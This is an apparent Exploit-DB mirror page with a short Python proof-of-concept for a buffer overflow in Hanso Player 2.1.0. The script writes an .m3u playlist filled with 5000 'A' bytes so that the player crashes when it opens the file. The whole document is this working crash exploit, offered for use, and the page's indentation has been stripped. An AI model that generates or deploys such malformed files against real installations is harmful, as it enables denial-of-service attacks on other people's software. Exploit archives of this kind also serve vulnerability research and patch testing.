exploit-db-mirror/exploits/windows/dos/24556.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
424 B
Python
Executable file

#!/usr/bin/python
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe
# Author: metacom
# RST
# version: 2.1.0
# Category: poc
# Tested on: windows 7 German
f=open("fuzzzzz.m3u","w")
print "Creating expoit."
junk="\x41" * 5000
try:
f.write(junk)
f.close()
print "File created"
except:
print "File cannot be created"